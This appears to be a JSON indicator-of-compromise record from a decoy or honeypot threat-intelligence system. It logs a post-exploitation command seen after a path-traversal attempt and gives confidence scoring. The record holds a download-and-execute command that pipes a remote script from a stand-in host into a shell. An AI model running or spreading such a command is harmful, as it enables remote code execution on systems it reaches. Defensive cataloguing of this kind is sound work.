{
  "ioc_id": "ioc_e1b6ef4d11ffdcc323747f8c",
  "type": "cmdline",
  "value": "sh -c 'curl -s http://stage2.example.invalid/m.sh | sh'",
  "display": "sh -c 'curl -s hxxp://stage2.example.invalid/m.sh | sh'",
  "roles": [
    "post_exploit"
  ],
  "origin": "observed",
  "redacted": false,
  "file_ioc_limited": true,
  "first_seen": 1792285324009,
  "last_seen": 1792285324009,
  "sightings": 1,
  "attempt_ids": [
    "att_7becbc03c1bf0363d7ce1575"
  ],
  "campaign_ids": [],
  "decoy_ids": [
    "dcy-demo-1"
  ],
  "catalogue_ids": [
    "foiled/demo-app/1.0.0"
  ],
  "event_ids": [
    "mem-04"
  ],
  "extracted_from": [
    "hook:hook.cmd_lines"
  ],
  "enrichment": [],
  "confidence": {
    "score": 68,
    "band": "medium",
    "wording": "we assess as",
    "publishable": true,
    "evidence": [
      {
        "signal_id": "decoy:dcy-demo-1",
        "source": "catalogue_prior",
        "weight": 100,
        "summary": "seen at decoy dcy-demo-1, which has no legitimate users"
      },
      {
        "signal_id": "hook:att_7becbc03c1bf0363d7ce1575:demo-app.upload-path-traversal",
        "source": "vuln_path_hook",
        "weight": 100,
        "summary": "seen in attempt att_7becbc03c1bf0363d7ce1575, where vulnerable-path hook demo-app.upload-path-traversal fired",
        "ref": "mem-03"
      },
      {
        "signal_id": "noise:ioc_e1b6ef4d11ffdcc323747f8c",
        "source": "noise_score",
        "weight": 10,
        "summary": "lowest source noise score across sightings is 10"
      }
    ],
    "caps_applied": []
  }
}
